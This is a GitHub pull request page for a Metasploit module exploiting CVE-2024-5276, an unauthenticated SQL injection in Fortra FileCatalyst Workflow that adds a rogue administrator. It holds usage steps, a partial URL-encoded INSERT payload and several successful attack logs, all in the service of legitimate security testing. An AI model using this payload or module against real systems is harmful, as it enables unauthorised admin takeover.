Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276) Module #19373

Merged
merged 7 commits into from
Aug 19, 2024
Merged

Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276) Module #19373

merged 7 commits into from
Aug 19, 2024

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented Aug 8, 2024

This is a new module which exploits an unauthenticated SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135 (CVE-2024-5276), by adding a new
administrative user to the web interface of the application.

Verification Steps

  1. Download the application from the vendor.
  2. Deploy it by following the vendor's installation guide.
  3. Start msfconsole
  4. use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli
  5. set RHOSTS <IP>
  6. set RPORT <PORT>
  7. set TARGETURI <URI>
  8. set NEW_USERNAME <username>
  9. set NEW_PASSWORD <password>
  10. run

A new admin user should have been successfully added.

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
[*] Running module against 192.168.137.195

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: CBD945F52F91E0F4354296C939BDABDE
[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=3324035&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=3324040&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
[+] Login successful!
[+] New admin user was successfully injected:
	elroy:yodTwsPs
[+] Login at: http://192.168.137.195:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed

Successfully tested on

  • Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Windows 10 22H2
  • Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Ubuntu 24.04 LTS

jvoisin
jvoisin reviewed Aug 9, 2024
View reviewed changes
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb
vprint_status("\tPW_CreationDate: #{pw_creationdate}")
vprint_status("\tLastLogin: #{lastlogin}")

payload = '1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C' \
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is there a way to format this a bit better, if only for maintenance/modifications' sake?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've split the string into multiple smaller strings, but I agree that it still does not provide great readability. Do you have any specific suggestions what else could be done?

modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb Show resolved Hide resolved
@h4x-x0r
Code cleanup
26d6347 
Code cleanup
@dledda-r7 dledda-r7 self-assigned this Aug 12, 2024
dledda-r7
dledda-r7 reviewed Aug 13, 2024
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello @h4x-x0r! Thanks for your PR!
The exploit works fine but I noticed the code is repeated two times.
Logs:

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > exploit
[*] Running module against 127.0.0.1

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: 9961556DCE0FC38B6D5B8D4F97823852
[*] FCWEB.FORM.TOKEN value: EYr4RlkpGK2URuACgFKt
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=8027650&FCWEB.FORM.TOKEN=EYr4RlkpGK2URuACgFKt
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=8027658&FCWEB.FORM.TOKEN=EYr4RlkpGK2URuACgFKt
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: EYr4RlkpGK2URuACgFKt
[+] Login successful!
[+] New admin user was successfully injected:
	gillian:ZEuKCYzN
[+] Login at: http://127.0.0.1:8080/workflow/jsp/logon.jsp
[*] Running module against ::1
[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: E885733650D12A5558C99507700F9F16
[*] FCWEB.FORM.TOKEN value: QQjgtkZYMXuyYZ0baj4I
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=8027685&FCWEB.FORM.TOKEN=QQjgtkZYMXuyYZ0baj4I
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=8027691&FCWEB.FORM.TOKEN=QQjgtkZYMXuyYZ0baj4I
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: QQjgtkZYMXuyYZ0baj4I
[+] Login successful!
[+] New admin user was successfully injected:
	gillian:ZEuKCYzN
[+] Login at: http://::1:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 13, 2024

Hello @h4x-x0r! Thanks for your PR! The exploit works fine but I noticed the code is repeated two times. Logs:

Thank you for reviewing the PR!

Does this also happen if you specify a remote system, or when using the IP address of your local system? In both cases, I only get it executed once.

From the output you shared, it looks like the loopback interface is being used, hence it is being run twice (127.0.0.1 for IPv4 and ::1 for IPv6). Is there a Metasploit specific way to prevent doing this when localhost is specified?

h4x-x0r added 2 commits August 13, 2024 20:54
@h4x-x0r
Added store_valid_credential
14e4a11 
Added store_valid_credential
@h4x-x0r
cleanup
ea2b592 
cleanup
dledda-r7
dledda-r7 approved these changes Aug 14, 2024
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ok, After checking the latest changes I think everything looks good to me.
Thanks!

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > set rhosts 192.168.136.130
rhosts => 192.168.136.130
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > exploit
[*] Running module against 192.168.136.130

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: AF6686AF60868F7B69D4237A4B113B48
[*] FCWEB.FORM.TOKEN value: 0pY8KfI0k676jnVO6Iw9
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=5810883&FCWEB.FORM.TOKEN=0pY8KfI0k676jnVO6Iw9
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=5810891&FCWEB.FORM.TOKEN=0pY8KfI0k676jnVO6Iw9
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: 0pY8KfI0k676jnVO6Iw9
[+] Login successful!
[+] New admin user was successfully injected:
	yuri:WoASjjyU
[+] Login at: http://192.168.136.130:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > creds
Credentials
===========

host             origin           service                        public                           private                                                            realm            private_type  JtR Format  cracked_password
----             ------           -------                        ------                           -------                                                            -----            ------------  ----------  ----------------
192.168.136.130  192.168.136.130  8080/tcp (http)                yuri                             WoASjjyU                                                                            Password

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) >

@h4x-x0r
Code cleanup
8ad328a 
Code cleanup
@dledda-r7
Copy link
Contributor

Retested after the change, everything looks good.

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
[*] Running module against 192.168.136.130

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: 5C3F0256688007F7EDD7C53D442B7B78
[*] FCWEB.FORM.TOKEN value: HGHjUHscGO65mS8Vmv6b
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=5955701&FCWEB.FORM.TOKEN=HGHjUHscGO65mS8Vmv6b
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=5955711&FCWEB.FORM.TOKEN=HGHjUHscGO65mS8Vmv6b
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: HGHjUHscGO65mS8Vmv6b
[+] Login successful!
​[+] New admin user was successfully injected:
	elda:tbcsqWTq0l4EF7F2
[+] Login at: http://192.168.136.130:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) >

h4x-x0r added 2 commits August 16, 2024 13:57
@h4x-x0r
Code cleanup
3577ae8 
Code cleanup
@h4x-x0r
cleanup
5a94869 
cleanup
@dledda-r7
Copy link
Contributor

Guess we are all set, landing it.

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
[*] Running module against 192.168.136.130

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: 5E471DAA883965B261106A683F849932
[*] FCWEB.FORM.TOKEN value: buFPmgjajDmZ4zsEI5zF
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=6067908&FCWEB.FORM.TOKEN=buFPmgjajDmZ4zsEI5zF
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=6067914&FCWEB.FORM.TOKEN=buFPmgjajDmZ4zsEI5zF
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: buFPmgjajDmZ4zsEI5zF
[+] Login successful!
[+] New admin user was successfully injected:
	hilary:KpiWAvIL705OSE4O
[+] Login at: http://192.168.136.130:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) >

@dledda-r7 dledda-r7 merged commit afd0f19 into rapid7:master Aug 19, 2024
39 checks passed
@dledda-r7
Copy link
Contributor

dledda-r7 commented Aug 19, 2024
edited by adfoster-r7
Loading

Release Notes

This adds an auxiliary module to exploit the CVE-2024-5276, a SQL Injection vulnerability that allows for adding an arbitrary administration user in the application.

@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 19, 2024
@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 19, 2024

Great, thank you!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@h4x-x0r @dledda-r7 @jvoisin @smcintyre-r7